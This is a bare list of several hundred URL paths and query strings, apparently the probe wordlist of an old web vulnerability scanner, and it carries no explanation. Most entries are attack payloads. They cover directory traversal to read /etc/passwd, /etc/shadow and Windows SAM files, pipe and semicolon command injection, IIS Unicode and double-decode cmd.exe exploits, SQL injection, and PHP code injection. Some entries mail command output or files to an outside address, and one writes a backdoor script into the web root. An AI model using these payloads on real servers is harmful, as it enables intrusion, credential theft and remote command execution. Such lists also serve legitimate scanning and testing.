/cgi-bin/ /cgi-local/ /cgi-win/ /cgi-home/ /cgi/ /sbin/ /include/ /includes/ /inc/ /java/ /config/ /administration/ /Administration/ /info/ /private/ /internal/ /priv/ /shtml/ /xsql/java/demo/ /../../shadow /remote_login.pl%20 /WebSTAR%20LOG /index.search /.dS_store /webstar.log /logs/webstar.log /pi_admin.admin /test.php3 /cgi-bin/test.php3 /cgi-bin/web2mail.cgi /cgi-bin/cgiemail/uargg.txt?0=0&1=1&2=2&256=256&array=array&a=a&i=i&c=c&arr=arr /cgi-bin/web2mail.cgi /random_banner/index.cgi?image_list=alternative_image.list&html_file=../../../../../etc/hosts /random_banner/index.cgi?image_list=alternative_image.list&html_file=|ls%20-la| /example.jsp../ /example%2ejsp /example.jsp.. /index.jsp.. /test.jsp.. /example.jsp%81 /index.JSP /index.jsp../ /test.jsp../ /index%2ejsp /test%2ejsp /index.JHTML /*.jhtml/ /*.jsp/ /servlet//..//../o.jsp /bb.sqljsp//..//..//..//..//..//../winnt/win.ini /a.jsp//..//..//..//..//..//../winnt/win.ini /ConsoleHelp/ /*.shtml/ /*.shtml/login.jsp /cgi-bin/mailview.cgi?cmd=view&fldrname=inbox&select=1&html= /cgi-bin/maillist.cgi?cmd=list&fldrname=inbox&fldnum=1&order=2&searchkey=&search_fldnum=0&page=99999&html= /cgi-bin/userreg.cgi?cmd=insert&lang=eng&tnum=3&fld1=test999%0als /..\..\..\winnt\repair\sam._ :80/../../../autoexec.bat /......autoexec.bat /.html/............/autoexec.bat /../../../../../../../boot.ini /....../ /..../ /.../ /\.../ /iisadmpwd/ /iisadmpwd/achg.htr /iisadmpwd/aexp.htr /iisadmpwd/aexp2.htr /iisadmpwd/aexp2b.htr /iisadmpwd/aexp3.htr /iisadmpwd/aexp4.htr /iisadmpwd/aexp4b.htr /iisadmpwd/anot.htr /iisadmpwd/anot3.htr /iisadmpwd/_AuthChangeUrl /_AuthChangeUrl /iissamples/ /iissamples/ISSamples/SQLQHit.asp?CiColumns=*&CiScope=extended_webinfo /iissamples/ISSamples/SQLQHit.asp?CiColumns=*&CiScope=extended_fileinfo /scripts/iisadmin/ism.dll%3fhttp/dir /iisadmin/ism.dll%3fhttp/dir /cgi-bin/htimage.exe /_vti_bin/fpcount.exe /global.asax /global.asax.cs /global.asa /global.asa+.htr /global.asa%3f.htr /global.asa\ /global.asa%20.pl /default.asp+.htr /default.asp%3f.htr /main.asp+.htr /_vti_bin/shtml.dll/tstt.htm /_vti_inf.html /_vti_log/author.log /_vti_pvt /_vti_bin/shtml.dll /_vti_bin/shtml.exe /_private/form_results.txt /secret/index.html /secret/index.htm /cgi-bin/phf /cgi-bin/commander.pl /cgi-bin/Count.cgi /cgi-bin/test.pl /cgi-bin/printenv /cgi-bin/test.cgi /cgi-bin/test-cgi /cgi-bin/nph-test-cgi /cgi-bin/php.cgi /cgi-bin/handler /cgi-bin/webgais /cgi-bin/websendmail /cgi-bin/webdist.cgi /cgi-bin/faxsurvey /cgi-bin/htmlscript /cgi-bin/pfdisplay /cgi-bin/perl.exe /cgi-bin/perl /perl /scripts/perl.exe /scripts/*.pl /wwwboard/wwwboard.pl /cgi-bin/wwwboard.pl /wwwboard/wwwadmin.pl /cgi-bin/wwwadmin.pl /wwwboard/wwwadmin.cgi /cgi-bin/wwwadmin.cgi /cgi-bin/jj /cgi-bin/fi /cgi-bin/finger /cgi-bin/finger.cgi?action=archives&cmd=specific&&filename=99.10.28.15.23.username.|/bin/ls| /cgi-bin/wais.pl /cgi-bin/edit.pl /cgi-bin/textcounter.pl /cgi-bin/info2www /cgi-bin/cachemgr.cgi /cgi-bin/wguest.exe /scripts/wguest.exe /cgi-bin/rguest.exe /scripts/rguest.exe /cgi-bin/test.exe /scripts/test.exe /cgi-bin/test.bat /scripts/test.bat /cgi-bin/www-sql /cgi-bin/search.cgi%3fletter= /cgi-bin/campas /cgi-bin/view-source /cgi-bin/webgais /cgi-bin/aglimpse /cgi-bin/wrap /cgi-bin/cgiwrap /cgi-bin/AnyForm2 /cgi-bin/infogate /search97/s97_cgi.exe /search/s97_cgi.exe /search97/search97.vts /search/search97.vts?HLNavigate=On&querytext=dcm&ServerKey=Primary&ResultTemplate=../../../../../../../etc/hosts&ResultStyle=simple&ResultCount=20&collection=books /search/s97.vts?Action=FormGen&ServerKey=Primary&Template= /cgi-bin/dumpenv.pl /session/adminlogin?RCpage=/sysadmin/index.stm /cgi-bin /cgi-shl /scripts /scripts/bdir.htr /scripts/convert.bas /scripts/files.pl /cgi-bin/files.pl /domcfg.nsf/%3fopen /domcfg.nsf/URLRedirect/%3fOpenForm /domcfg.nsf/viewname%3fSearchView&Query="*" /log.nsf /domlog.nsf /names.nsf /catalog.nsf /database.nsf?EditDocument /names.nsf/Open /cgi-bin/unlg1.1 /cgi-bin/man.sh /cgi-bin/AT-admin.cgi /cgi-bin/filemail.pl /cgi-bin/mailform.pl /cgi-bin/mailto.cgi /cgi-bin/mailform.cgi /cgi-bin/maillist.pl /cgi-bin/formto.pl /cgi-bin/bnbform.cgi /cgi-bin/bnbform.pl /cgi-bin/bnbform /cgi-bin/survey.cgi /htbin/postform?h_mailto=swoopme%40hotmail.com&h_reply-file=../../../../../../../etc/hosts /cgi-bin/postform?h_mailto=swoopme%40hotmail.com&h_reply-file=../../../../../../../etc/hosts /cgi-bin/postform?h_mailto=swoopme%40hotmail.com&h_reply-file=|ls| /cgi-bin/textcounter.pl /cgi-bin/classifieds.cgi /cgi-bin/environ.cgi /cgi-bin/environ.pl /cgi-dos/args.bat /cgi-bin/carbo.dll /cgi-bin/fpexplore.exe /cfdocs/expeval/exprcalc.cfm /cfdocs/expeval/sendmail.cfm /cfdocs/expeval/eval.cfm /cfdocs/expeval/openfile.cfm /cfdocs/expeval/displayopenedfile.cfm /CFDOCS/exampleapps/ /cfdocs/exampleapp/email/getfile.cfm /cfdocs/examples/CVLibrary/GetFile.CFM?FT=Text&FST=Plain&FilePath=C:\boot.ini /cfdocs/exampleapp/publish/admin/addcontent.cfm /cfdocs/exampleapp/docs/sourcewindow.cfm?Template= /cfdocs/snippets/evaluate.cfm /cfdocs/snippets/fileexists.cfm /cfdocs/snippets/viewexample.cfm?Tagname= /cfdocs/cfmlsyntaxcheck.cfm /cfdocs/snippets/setlocale.cfm /cgi-bin/whois_raw.cgi /mall_log_files/order.log /PDG_Cart/shopper.conf /PDG_Cart/order.log /pw/storemgr.pw /quikstore.cfg /orders/mountain.cfg /orders/orders.txt /Admin_files/order.log /merchants/admin.pw /store/customers/ /store/temp_customers/ /cgi-bin/query%3f :9000/cgi-bin/query%3f /cgi-bin/admin.cgi /cgi-bin/ppdscgi.exe /ppwb/Temp/ :8010/c:// :8010/d:// :8010// :8010/..../ :8010/ :8080/\../readme.txt :5000/ :2301 :3128/../../../../ :9090 :901 :8383 :800/../..\ :800/C:/ :12000 :2301/Proxy/LoginResponse /adsamples/config/site.csc /iissamples/exair/howitworks/codebrws.asp /samples/Search/queryhit.htm /iissamples/sdk/asp/docs/codebrws.asp /AdvWorks/equipment/catalog_type.asp /scripts/repost.asp /SPSamp/AdvWorks/equipment/catalog_type.asp /cgi-bin/rwwwshell.pl /~/ /~root/ /~admin/ /~nobody/ /~bin/ /~guest/ /~log/ /~logs/ /~lp/ /~named/ /~test/ /~tmp/ /cgi-bin/imagemap.exe /../../../../config.sys /cgi-bin/foo.cmd?xxx&dir /scripts/foo.cmd?xxx&dir /cgi-dos/foo.cmd?xxx&dir /cgi-bin/script.bat%3f&dir /scripts/script.cmd%3f&dir /scripts/script.bat%3f&dir /cgi-bin/tst.bat /cgi-bin/tst2.bat /cgi-bin/test.bat /cgi-bin/input.bat /cgi-bin/input2.bat /ssi/envout.bat /cgi-bin/get32.exe /cgi-bin/tst.bat /cgi-bin/alibaba.pl /cgi-bin/post32.exe /cgi-bin/post16.exe /cgi-bin/get16.exe /cgi-bin/lsin.exe /cgi-bin/lsindex2.bat /cgi-bin/imapcern.exe /cgi-bin/imapncsa.exe /cgi-bin/aliredir.exe :8080/../examples//WEB-INF/../../../../../ :8080/../../../conf/Eserv.ini :3128/../../../conf/Eserv.ini :801/../../../../../../../../etc/hosts :8888/ :9998/ /publisher/ /bigconf.cgi /cgi-bin/bigconf.cgi /scripts/bigconf.cgi /cgi-bin/ftpdiag.cgi /cgi-bin/formhandler.cgi /cgi-bin/add_ftp.cgi /cgi-bin/OrderForm.cgi /cgi-bin/cgitest.exe /cgi-bin/flexform.cgi /ows-bin/owa/owa%5futil%2esignature /ows-bin/owa/owa%5futil%2eshowsource /ows-bin/perlidlc.bat?&dir /ows-bin/*.bat?&dir :8003/Display /cgi-bin/whois.cgi /minivend/catalog.cfg /cgi-bin/simple /cgi-bin/simple/config/menu /cgi-bin/simple/config/seefile.html?mv_arg=catalog%2ecfg /cgi-bin/simple/view_page.html?mv_arg=|/bin/ls| /search%3f /suche%3f /search/iaquery.exe%3f /cgi-bin/GW5/GWWEB.EXE?HELP=bad-request /cgi-bin/GW5/GWWEB.EXE?HELP=../../../../../index /cgi-bin/webwho.pl /cgi-bin/w3-msql/index.html /cgi-bin/FormMail.pl /cgi-bin/formmail.pl /msadc/msadcs.dll /msadc/samples/adctest.asp /scripts/tools/getdrvrs.exe /scripts/tools/newdsn.exe%3fdriver=Microsoft%2BAccess%2BDriver%2B%28*.mdb%29&dsn=Web%20SQL&dbq=c:\web.mdb&newdb=CREATE_DB&attr= /scripts/samples/ctguestb.idc /scripts/samples/details.idc /cgi-bin/forum.pl /cgi-bin/forum-admin.pl /cgi-bin/sendmail.cgi /cgi-bin/guestadd.pl /cgi-bin/plusmail /manage/cgi/cgiproc?Nocfile= /iissamples/issamples/oop/qfullhit.htw?CiWebHitsFile=&CiRestriction=none&CiHiliteType=Full /iissamples/issamples/oop/qsumrhit.htw /iissamples/exair/search/qfullhit.htw /iissamples/exair/search/qsumrhit.htw /null.htw?CiWebHitsFile=/global.asa%20&CiRestriction=none&CiHiliteType=Full /iishelp/iis/misc/iirturnh.htw /cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi /cgi-bin/wwwthreads/changedisplay.pl /scripts/wsisa.dll/WService=anything?WSMadmin /cgi-bin/Ultimate.cgi /cgi-bin/dcboard.cgi /cgi-bin/forums/dcboard.cgi /cgi-bin/dcforum/dcboard.cgi /cgi-bin/forumdisplay.cgi /ubb/cgi-bin/postings.cgi /cgi-bin/postings.cgi /cgi-bin/core /.HTACCESS. /%2eHTACCESS /%2ehtaccess /%2ehtpasswd /cgi-bin/echo.bat /cgi-bin/hello.bat /cgi-bin/htsearch?exclude=%60%60 /cgibin/htgrep/file=index.html&hdr=/etc/hosts /cgi-bin/loadpage.cgi /cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=|/bin/id /cgi-bin/rmp_query /cgi-bin/postcard.pl /cgi-bin/.fhp /cgi-bin/clickresponder.pl /cgi-bin/responder.cgi /cgi-win/uploader.exe /cgi-bin/uploadn.asp /cgi-bin/excite /cgi-bin/sojourn.cgi?cat=ng%00 /cgi-bin/abuse.man?file=&domain=&script= /ping /jsp/source.jsp /cgi-bin/dfire.cgi /cd/../config/html/cnf_gi.htm /cgi-bin/bb-hist.sh?HISTFILE=../../../../../../etc/hosts /ccbill/ /cgi-bin/windmail.exe?-n%20c:\boot.ini%20swoopme@@hotmail.com /cgi-bin/windmail.exe?%20|%20dir%20c:\ /cgi-bin/dcforum/install_help.cgi /cgi-bin/dcforum/dcforum.cgi?az=list&file=filename%00 /cgi-bin/dcforum.cgi?az=list&file=filename%00 /doc/ /scripts/slxweb.dll/admin /cgi-bin/getdoc.cgi /cgi-bin/webplus?script= /cgi-bin/scripts/cart.pl /cgi-bin/scripts/cart.pl?vars /cgi-bin/scripts/cart.pl?env /cgi-bin/scripts/cart.pl?db|cart.pl|All%20Items /cgi-bin/bizdb1-search.cgi?template=bizdb-summary&dbname=;ls|mail%20swoopme@@hotmail.com|&f6=^a.*&action=searchdbdisplay /_vti_bin/_vti_aut/dvwssr.dll /_vti_bin/_vti_aut/mtd2lv.dll /piranha/secure/passwd.php3?username=piranha&passwd=q /cgi-bin/UltraBoard/UltraBoard.pl?Action=PrintableTopic&Post=../../UBData/Members/members.grp%00&Board=6210&Idle=10&Sort=0&Order=Descend&Page=0&Session= /cgi-bin/UltraBoard/UltraBoard.cgi?Action=PrintableTopic&Post=../../UBData/Members/members.grp%00&Board=6210&Idle=10&Sort=0&Order=Descend&Page=0&Session= /scripts/cart32.exe/cart32clientlist?passwd=wemilo /scripts/c32web.exe/ChangeAdminPassword /cgi-bin/cart32.exe/expdate /scripts/dbman/db.cgi?db=tedb /scripts/process_bug.cgi /cgi-bin/process_bug.cgi /cgi-bin/counterfiglet/nc/f=;echo;w;uname%20-a;id /scripts/emurl/RECMAN.dll? /cgi-bin/allmanage.pl /cgi-bin/allmanage.cgi /cgi-bin/calender.pl /cgi-bin/calender_admin.pl /cgi-bin/ads.cgi /cgi-bin/admin.cgi /ads/admin.cgi /cgi-bin/adpassword.txt /ads/adpassword.txt /cgi-bin/infosrch.cgi /scripts/Carello/add.exe :8000/cgi/wja?page=wja /robots.txt /file/index.jsp /file/main.jsp /file/main.shtml /file/index.shtml /file/main.jhtml /file/index.jhtml /cgi-bin/showfile /servlet/SessionServlet /servlet/viewsource.jsp /viewsource.jsp :8987/sawmill?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1,1,1,1,1,1+3 /cgi-bin/sawmill5?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1 /cgi-bin/pollit/Poll_It_SSI_v2.0.cgi?data_dir=/etc/hosts%00 /cgi-bin/pollit/Poll_It_v2.0.cgi?data_dir=/etc/hosts%00 /site/eg/source.asp /eg/source.asp /cgi-bin/source.asp /cgi-bin/bb-hostsvc.sh?HOSTSVC=/../../../../../../../../etc/hosts /cgi-bin/msn.cgi /cgi-bin/disk2server.cgi /cgi-bin/upload.cgi /.www.my.cnf /cgi-bin/.www.my.cnf /cgi-bin/futureforum.cgi /cgi-bin/futureforum3.cgi /examples/applications/bboard/bboard_frames.html /admin-serv/config/admpw /https-admserv/config/admpw /cgi-bin/cwmail.ini /cgi-bin/cookmail /cgi-bin/cookmail/cookmail /cgi-bin/cookmail/cookmail.exe /cgi-bin/ftp/ftp.pl?dir=../../../../../../etc /active.log /cgi/cvsweb.cgi /cgi-bin/cvsweb.cgi :8010/Guide/../../../../../../../../../../../../../../../etc/shadow :8010/Guide/../../../../../../../../../../../var/CommuniGate/Accounts/postmaster.macnt/account.settings /bin/common/user_update_admin.pl /bin/common/user_update_passwd.pl?user_id=V&firstname=FI&lastname=LA&course_id=SID&password1=NEWPWD&password2=NEWPWD /cgi-bin/ssi//../../../../../../../../../etc/hosts /examples/servlet/SnoopServlet :8080/examples/servlet/SnoopServlet :8080/examples/jsp/snp/anything.snp :8080/anything.jsp :8080/%252e%252e/%252e%252e/%00.jsp /anything.jsp /examples/jsp/snp/anything.snp /pservlet.html /cgi-bin/mailto?MailTo=swoopme@hotmail.com&text=tst&EmailForm=/cgi-bin/mailto /cgi-bin/mailfile?MailTo=swoopme@hotmail.com&FileName=mailfile:c&Subject=tst&MailFrom=tst@no.net /cgi-bin/mailfile.cgi?real_name=rc&email=swoopme@hotmail.com&filename=mailfile.cgi /cgi-bin/formprocessor.asp?MailTo=swoopme@hotmail.com&MailFrom=tst@no.net&Message=tst&MailTemplate1=/cgi-bin/formprocessor.asp /cgi-bin/af.cgi?_browser_out=|/bin/ls| /%00/ /admin/ :8080/tea/dynamic/system/teaservlet/Admin?admin=true /servlet/file /%2E%2E/%2E%2E/Program%20Files/AnalogX/SimpleServer/www/server.log /servlet/test/pathInfo/test /..../ /~nobody/etc/ :3000/../../hosts :444/..\..\..\..\..\autoexec.bat /pccsmysqladm/incs/dbconnect.inc /include/dbconfig.inc /dbconfig.inc /include/config.inc /inc/db.inc /inc/odbc.inc /db.inc /odbc.inc /config.inc :8888/ab2/@Ab2Admin :8888/cgi-bin/admin/admin :8888/cgi-bin/admin/admin?command=add_user&uid=percebe&password=percebe&re_password=percebe /cgi-bin/netauth.cgi?cmd=show&page=../../ /admin.php3?admin=whatever :9090/board.html :9090/examples/applications/bboard/bboard_frames.html :9090/servlet/com.sun.server.http.pagecompile.jsp92.JspServlet/board.html /cgibin/amadmin.pl?setpasswd /cgi-bin/awl/auctionweaver.pl?flag1=1&catdir=\..\..\..\..\..\..\..\..\&fromfile=Boot.ini /cgi-bin/news/news.cgi?addAuthor /cgi-bin/awl/auctionweaver.pl /cgi-bin/CGImail.exe?%24Attach%24=file.txt&%24To%24=swoopme@hotmail.com /.photon/voyager/config.full /cgi-bin/cpmdaemon.cgi :8088 /products/phpPhotoAlbum/explorer.php?folder=../../../../../../../etc/ /phpPhotoAlbum/getalbum.php?album=../../../etc/ /phpMyAdmin/sql.php?goto=/etc/hosts&btnDrop=No /phpMyAdmin/tbl_replace.php?db=test&table=ess&goto=/etc/hosts /phpMyAdmin/tbl_copy.php?strCopyTableOK=".passthru('/bin/ls')." /phpMyAdmin/tbl_copy.php?db=test&table=haxor&new_name=test.haxor2&strCopyTableOK=".passthru('/bin/ls')." /cgi-bin-sdb/ /cgi-bin/YaBB.pl?board=news&action=display&num=../../../../../../../../etc/hosts%00 /siteman000510/siteman.php3 /cgi-bin/multihtml.pl?multi=/etc/hosts%00html /search.dll?search?query=%00&logic=AND m/search.dll?search?query=/&logic=AND :8002/Newuser?Image=../../database/rbsserv.mdb /doc/packages/ /cp/rac/nsManager.cgi?Domain=nothing.org&IP=127.0.0.1&OP=add&Language=english&Submit=Confirm /_private/shopping_cart.mdb /cgi-bin/webdata_test.pl /cgi-bin/cached_feed.cgi?../../../.+/etc/hosts /cgi-bin/ssi/cgi-bin/ssi /cgi-bin/ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/hosts /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/hosts /Album/?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&dispsize=640&start=0 /cgi-bin/shop.cgi/page=../../../../etc/hosts /cgi-bin/search/search.cgi?keys=*&prc=any&category=../../../../../../../../etc /scripts/..%u00255c..%u00255cwinnt/system32/cmd.exe?/c+dir+c:\ /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir /..%c1%1c../winnt/system32/cmd.exe?/c+dir /scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir /..%c0%9v../winnt/system32/cmd.exe?/c+dir /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir /..%c0%af../winnt/system32/cmd.exe?/c+dir /scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir /..%c0%qf../winnt/system32/cmd.exe?/c+dir /scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir /..%c1%8s../winnt/system32/cmd.exe?/c+dir /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir /..%c1%9c../winnt/system32/cmd.exe?/c+dir /scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir /..%c1%pc../winnt/system32/cmd.exe?/c+dir /scripts/..%d1%9c../winnt/system32/cmd.exe?/c+dir /..%d1%9c../winnt/system32/cmd.exe?/c+dir /scripts/..%d0%af../winnt/system32/cmd.exe?/c+dir /..%d0%af../winnt/system32/cmd.exe?/c+dir /msadc/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir /iisadmpwd/..%c0%af../cmd.exe?/c+dir /msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\ /msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+c:\ /msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\ /msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\ /MSADC/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\ /MSADC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\ /MSADC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\ /MSADC/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\ /_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\ /_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir+c:\ /_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\ /_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\ /PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\ /PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\ /PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\ /PBServer/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\ /Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\ /Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\ /Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\ /Rpc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\ /_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\ /_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir+c:\ /_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\ /_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\ /cgi-bin/shopper.cgi?newpage=../../../../../../../../../etc/hosts /cgi-bin/Web_Store/web_store.cgi?page=%00 /cgi-bin/phpinfo.php /cgi-bin/phpinfo.php3 :8000/servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter/../../test.jsp :8000/servlet/ssifilter/../../test.jsp :8000/servlet/com.livesoftware.jrun.plugins.jsp.JSP/../../../tst.txt :8000/servlet/jsp/../../tst.txt :8100//WEB-INF/ :8100//WEB-INF/web.xml :8100//WEB-INF/webapp.properties /servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter/../../test.jsp /servlet/ssifilter/../../test.jsp /servlet/com.livesoftware.jrun.plugins.jsp.JSP/../../../tst.txt /servlet/jsp/../../tst.txt //WEB-INF/ //WEB-INF/web.xml //WEB-INF/webapp.properties /cgi-bin/pagelog.cgi?display=../../../../tmp/a /cgi-bin/pagelog.cgi?name=../../../../../tmp/blah /cgi-bin/gbook.cgi?_MAILTO=xx;ls /cgi-bin/search.pl /admin/includes/ /cgi-bin/bb-hist.sh?HISTFILE=/home/* /cgi-bin/bb-histlog.sh /cgi-bin/bb-hostsvc.sh /cgi-bin/bb-rep.sh /cgi-bin/bb-replog.sh /cgi-bin/bb-ack.sh /cgi-bin/cgiforum.pl?thesection=../../../../../../etc/hosts%00 /cgi-bin/cgiforum.cgi?thesection=../../../../../../etc/hosts%00 /cgi-bin/build.cgi /build.cgi /forums/list.php /cgi-bin/html_page?TEMPLATE=main /default.php%20%20 /default.php3%20%20 /index.php3%20%20 /index.php%20%20 /index.php3?vhosts=http://go.to /cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report? /cgi-bin/ncommerce/ExecMacro/orderdspc.d2w/report? /cgi-bin/db2www/library/document.d2w/report?uid=UNKNOWN&pwd=&search_type=SIMPLE&r_host=&last_page=db2www0022.html&fn=db2www.html /cgi-bin/db2www.exe/../../db2www.ini /cgi-bin/db2www/../../db2www.ini /db2_doc/html/db2srsen.exe /+/ /+./ /++/ /++./ /includes/global.inc /2600-cgi/ezmlm-cgi /cgi-bin/ezmlm-cgi /mmstdod.cgi?ALTERNATE_TEMPLATES=|%20echo%20"Content-Type:%20text%2Fhtml"%3Becho%20""%20%3B%20id%00 /."./."./Perl/eg/core/findtar /."./."./Perl/eg/core/findtar+&+echo+system(@ARGV);+>+c:\InetPub\wwwroot\cmd.pl+&+.pl /."./."./winnt/reapir/sam._%20.pl /cgi-bin/ad.cgi?file=../../../../../../../../etc/hosts /ad.cgi?file=../../../../../../../../etc/hosts /subscribe.pl /cgi-bin/simplestmail.cgi?redirect=www.ibm.com&MyEmail=swoopme@hotmail.com;ls%20-alsi&submit=run /everythingform.cgi?config=../../../../../../../../bin/ping&Name=xx&e-mail=swoopme@hotmail.com /cgi-bin/everythingform.cgi?config=../../../../../../../../bin/ping&Name=xx&e-mail=swoopme@hotmail.com /cgi-bin/dcguest.cgi /cgi-bin/dcguest/dcguest.cgi /guestbook/dcguest.cgi /index.php3.%5c../..%5cconf/httpd.conf /phpgroupware/inc/phpgwapi/phpgw.inc.php /submit.php /cgi-bin/ezshopper3/loadpage.cgi?user_id=id&file=/ /cgi-bin/ezshopper2/loadpage.cgi?id+/ /cgi-bin/passcfg /passcfg /pls/admin_/? /WebDB/admin_/ /cgi-bin/bsguest.cgi?email=x;ls /cgi-bin/bslist.cgi?email=x;ls /technote/main.cgi/oops?board=FREE_BOARD&command=down_load&filename=/../../../main.cgi /cgi-bin/main.cgi/oops?board=FREE_BOARD&command=down_load&filename=/../../../main.cgi /technote/technote/print.cgi?board=../../../../../../../../etc/passwd%00 /cgi-bin/technote/print.cgi?board=../../../../../../../../etc/passwd%00 /cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../bin/ls /servlet/FormMailServlet?juhu.txt /servlet/SurveyXMLServlet?jeaaa.txt /servlet/WebPopServlet?config=uii.txt /cgi-bin/iconboard/register.cgi?SEND_MAIL=/bin/ls /cgi-bin/webdriver /cgi-bin/mailmanager.pl?setupfile=demo&page=|/bin/ls| /cgi-bin/mailman/mailmanager.pl?setupfile=demo&page=|/bin/ls| /cgi-bin/gettext.pl /cgi-bin/newsdesk.cgi?t=../pass.txt /cgi-bin/ping.cgi /cgi-bin/traceroute.cgi /cgi-bin/finger.cgi /cgi-bin/whois.cgi /.nsf/../winnt/win.ini /.box/../winnt/win.ini /.ns4/../winnt/win.ini /.nsf/../lotus/domino/notes.ini /%00.nsf/../lotus/domino/notes.ini /cgi-bin/bbs_forum.cgi?forum=test&read=../bbs_forum.cgi /cgi-bin/debug.pl /cgi-bin/debug.cgi /mysql.class /class/mysql.class /inc/sendmail.inc /cgi-bin/statsconfig.pl /cgi-bin/stats.pl /deletecontact.php?item_id=100+OR+TRUE+; /cgi-bin/pi?page=document/show_file&id= /./WEB-INF/ /./WEB-INF/web.xml :8000/./WEB-INF/ :8000/./WEB-INF/web.xml /cgi-bin/hsx.cgi?show=../../../../../../../etc/hosts%00 /cgi-bin/suche/hsx.cgi?show=../../../../../../../etc/hosts%00 /user_info.php3?user_username=''+or+admin_level=2+or+username%3d'x'+and+users.id=access.user_id;%00 /cgi-bin/user_info.php3?user_username=''+or+admin_level=2+or+username%3d'x'+and+users.id=access.user_id;%00 /guestserver/guestserver.cgi?email=|ls|swoopme@hotmail.com /cgi-bin/guestserver.cgi?email=|ls|swoopme@hotmail.com /cfbin/board.cgi /cgi-bin/board.cgi /cgi-bin/getcomments.pl /..\..\..\..\..\..\winnt\system32\cmd.exe?/c+ /cgi-bin/form-to-mail.cgi?_out_file=mungo.dat&x=y /cgi-bin/leave-link.cgi?file=mungo.dat&url=hoschi.net /cgi/commerce.cgi?page=../../../../etc/hosts%00index.html /cgi-bin/commerce.cgi?page=../../../../etc/hosts%00index.html /cgi-bin/auktion.pl?menue=../../../../../../../../../../../../../etc/hosts /pals-cgi?palsAction=restart&documentName=pals-cgi /cgi-bin/pals-cgi?palsAction=restart&documentName=pals-cgi /opendir.php?requesturl=/etc/hosts /ROADS/cgi-bin/search.pl?form=search.pl%00 /cgi-bin/search.pl?form=search.pl%00 /cgi-bin/empower?DB=mungowitsch /cgi-bin/way-board.cgi?db=way-board.cgi%00 /way-board/way-board.cgi?db=way-board.cgi%00 /cgi-bin/webspirs.cgi?sp.nextform=webspirs.cgi /cgi-bin/sendtemp.pl?templ=../../etc/passwd /upload.html /cgi/bin/test.txt;%20/bin/ls /cgi-bin/test.txt;%20/bin/ls /isapi/tstisapi.dll /cgi-bin/store.cgi?StartID=../../../../../../../etc/hosts%00 /cgi-bin/adcycle/adcenter.cgi /ext.dll /cgi-bin/mailnews.cgi /caspsamp/codebrws.asp?source=/caspsamp/../admin/conf/service.pwd /caspsamp/codebrws.asp?source=/caspsamp/../global_odbc.ini /caspsamp/codebrws.asp?source=/caspsamp/../admin/logs/server /caspsamp/codebrws.asp?source=/caspsamp/../LICENSE.LIC /caspsamp/codebrws.asp?source=/caspsamp/../logs/server-3000 /foldoc/template.cgi?template.cgi /cgi-bin/ikonboard/help.cgi?helpon=../../../../../etc/hosts%00 /cgi-bin/post-query? /cgi-bin/anacondaclip.pl?template=../../../../../../../../../../../../etc/hosts :8080/../../winnt/win.ini%00examples/jsp/hello.jsp /../../winnt/win.ini%00examples/jsp/hello.jsp :8080/index.js%2570 /index.js%2570 /cgi-bin/webspirs.cgi?sp.nextform=../../../../../../etc/hosts /jsp_test/PoolMan.jsp /PoolMan.jsp :8080/.jsp/WEB-INF/classes/Env.java /.jsp/WEB-INF/classes/Env.java /cgi-bin/talkback.cgi?article=../../../../../../../../etc/passwd%00&action=view&matchview=1 